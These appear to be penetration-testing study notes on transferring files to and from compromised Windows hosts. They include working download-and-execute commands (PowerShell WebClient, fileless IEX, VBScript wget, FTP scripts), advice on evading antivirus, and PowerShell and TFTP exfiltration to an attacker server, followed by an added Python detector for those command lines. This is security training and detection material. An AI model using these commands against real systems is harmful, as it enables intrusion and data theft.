File Transfers

For more practical notes, see File Transfer Techniques

Considerations and Preparations

Dangers of Transferring Attack Tools

  • Could be abused by other attackers
  • Antivirus software will detect and remediate the tools
    • To get around this, try to use native tools as much as possible

Installing Pure-FTPd

  • install: sudo apt update && sudo apt install pure-ftpd

  • to configure and start, use this script:

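    #!/bin/bash

    # Create an unprivileged system account that owns the FTP files
    sudo groupadd ftpgroup
    sudo useradd -g ftpgroup -d /dev/null -s /etc ftpuser
    # Create the virtual FTP user "offsec" (prompts for a password) and build the user database
    sudo pure-pw useradd offsec -u ftpuser -d /ftphome
    sudo pure-pw mkdb
    # Enable PureDB authentication; "sudo cd" cannot change the script's directory, so link by absolute path
    sudo ln -s ../conf/PureDB /etc/pure-ftpd/auth/60pdb
    sudo mkdir -p /ftphome
    sudo chown -R ftpuser:ftpgroup /ftphome/
    sudo systemctl restart pure-ftpd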

The Non-Interactive Shell

  • e.g.: basic bind or reverse shell
  • if we then try to start a program which prompts us for input (← an interaction), we won’t get the prompt message, because STDOUT is not redirected correctly
  • to fix this we can upgrade our basic shell by:
    • Unix: python -c 'import pty; pty.spawn("/bin/bash")'

Transferring Files with Windows Hosts

Non-Interactive FTP Download

  • assumption: we have a bind shell on our Windows target talking with our Kali instance
  • Windows by default ships with a CLI called: ftp
  • We’ll abuse the -s:filename flag, which specifies a text file containing FTP commands; the commands will automatically run after FTP starts.
    • copy the file we want to transfer into ftphome: sudo cp /usr/share/windows-resources/binaries/nc.exe /ftphome/

    • restart pure-ftpd: sudo systemctl restart pure-ftpd

    • create our command text file:

      echo open 10.11.0.4 21> ftp.txt
      echo USER offsec>> ftp.txt
      echo lab>> ftp.txt
      echo bin >> ftp.txt
      echo GET nc.exe >> ftp.txt
      echo bye >> ftp.txt
    • execute: ftp -v -n -s:ftp.txt

Windows Downloads Using Scripting Languages

  • VBScript
    • place the file you want to upload to the client in the web root: sudo cp /usr/share/windows-resources/binaries/wget.exe /var/www/html/

    • create a vbs file which acts like wget:

      echo strUrl = WScript.Arguments.Item(0) > wget.vbs
      echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
      echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
      echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
      echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
      echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
      echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
      echo  Err.Clear >> wget.vbs
      echo  Set http = Nothing >> wget.vbs
      echo  Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
      echo  If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
      echo  If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
      echo  If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
      echo  http.Open "GET", strURL, False >> wget.vbs
      echo  http.Send >> wget.vbs
      echo  varByteArray = http.ResponseBody >> wget.vbs
      echo  Set http = Nothing >> wget.vbs
      echo  Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
      echo  Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
      echo  strData = "" >> wget.vbs
      echo  strBuffer = "" >> wget.vbs
      echo  For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
      echo  ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
      echo  Next >> wget.vbs
      echo  ts.Close >> wget.vbs
    • use that wget to download the file we placed into our web root: cscript wget.vbs http://10.11.0.4/wget.exe evil.exe

  • PowerShell
    • create a PowerShell script which acts like wget:

      echo $webclient = New-Object System.Net.WebClient >>wget.ps1
      echo $url = "http://10.11.0.4/wget.exe" >>wget.ps1
      echo $file = "evil.exe" >>wget.ps1
      echo $webclient.DownloadFile($url,$file) >>wget.ps1
    • use that wget script to download the file we placed into our web root: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

    • or just use this one-liner: powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe', 'evil.exe')

    • or if we need to be stealthy and not write the file to disk:

      • create a powershell script in our web root: echo 'Write-Output "Hello World"' > /var/www/html/helloworld.ps1
      • execute it: powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://10.11.0.4/helloworld.ps1')

Windows Downloads with exe2hex and PowerShell

  • This option will take a bit longer, but it is also less common:
    • compress our binary: upx -9 evil.exe

    • convert it to hex and create a Windows script: exe2hex -x evil.exe -p evil.cmd

    • copy it to our clipboard: cat evil.cmd | xclip -selection clipboard

    • paste the script into our windows shell

      • this will redirect the hex data into powershell
      • which will assemble it back into a binary
    • All this is Non-Interactive!

Windows Uploads Using Windows Scripting Languages

  • place this php code into the web root /var/www/html/upload.php:

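    <?php
    // Directory that receives the uploads; must be writable by www-data
    $uploaddir = '/var/www/uploads/';

    // basename() drops any path components from the client-supplied file name
    $uploadfile = $uploaddir . basename($_FILES['file']['name']);

    move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
    ?>
  • create the folder: sudo mkdir /var/www/uploads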

  • set the permissions: sudo chown www-data: /var/www/uploads

  • Remove the PHP file after you’re done! Otherwise anybody can create a file on your Kali VM

  • Upload the important file from the target: powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')

Uploading Files with TFTP

  • If the target is very old (up to Windows XP and 2003) use this method

  • install a TFTP server on Kali, set it up and run it:

    sudo apt update && sudo apt install atftp
    sudo mkdir /tftp
    sudo chown nobody: /tftp
    sudo atftpd --daemon --port 69 /tftp
  • on our old Windows target, run tftp -i 10.11.0.4 put important.docx to upload the file
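
Seen from the defending side, each native-tool transfer in these notes leaves a recognisable process command line (Sysmon Event ID 1 or Security 4688). The following is an added example, not part of the original notes: it matches those command lines over constructed sample events. The rule names, the `host|parent|command line` log format and the benign lines are assumptions made for illustration.

```python
import re

# Rules for process command lines, one per transfer method in the notes.
# Rule names are made up for this example.
RULES = {
    "ftp_script_file": re.compile(r"\bftp(\.exe)?\s.*-s:\S+", re.I),
    "script_host_url": re.compile(r"\b[cw]script(\.exe)?\s.*\.vbs\s.*https?://", re.I),
    "ps_webclient_io": re.compile(
        r"\bpowershell(\.exe)?\s.*Net\.WebClient\).*\.(DownloadFile|DownloadString|UploadFile)\(", re.I),
    "ps_iex_download": re.compile(r"\bpowershell(\.exe)?\s.*\bIEX\b.*DownloadString\(", re.I),
    "ps_policy_bypass": re.compile(r"\bpowershell(\.exe)?\s.*-ExecutionPolicy\s+Bypass\b", re.I),
    "tftp_transfer": re.compile(r"\btftp(\.exe)?\s.*-i\s+\S+\s+(get|put)\s", re.I),
}
# URLs or bare IPv4 addresses on the command line, extracted for triage.
REMOTE = re.compile(r"https?://[^\s'\")]+|\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed sample events (host|parent process|command line), not real telemetry.
SAMPLE = r"""
WS01|cmd.exe|ftp -v -n -s:ftp.txt
WS01|cmd.exe|cscript wget.vbs http://10.11.0.4/wget.exe evil.exe
WS01|cmd.exe|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
WS01|cmd.exe|powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe', 'evil.exe')
WS01|cmd.exe|powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://10.11.0.4/helloworld.ps1')
WS01|cmd.exe|powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')
XP02|cmd.exe|tftp -i 10.11.0.4 put important.docx
WS03|explorer.exe|cscript.exe C:\Windows\System32\slmgr.vbs /dli
WS03|explorer.exe|powershell.exe -NoProfile -File C:\Scripts\backup.ps1
"""

def classify(cmdline):
    """Return the names of all rules the command line matches."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def scan(log_text):
    """Return one alert dict per event that matches at least one rule."""
    alerts = []
    for line in filter(None, map(str.strip, log_text.splitlines())):
        host, parent, cmdline = line.split("|", 2)
        hits = classify(cmdline)
        if hits:
            alerts.append({"host": host, "parent": parent, "rules": hits,
                           "remote": REMOTE.findall(cmdline)})
    return alerts

if __name__ == "__main__":
    for a in scan(SAMPLE):
        print(a["host"], ",".join(a["rules"]), a["remote"])
```

For the ftp -s: and -File wget.ps1 events the remote address is empty, because the server is named inside the script file rather than on the command line; triage has to pull that file or correlate with network logs.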


Relevant Note(s): Penetration Testing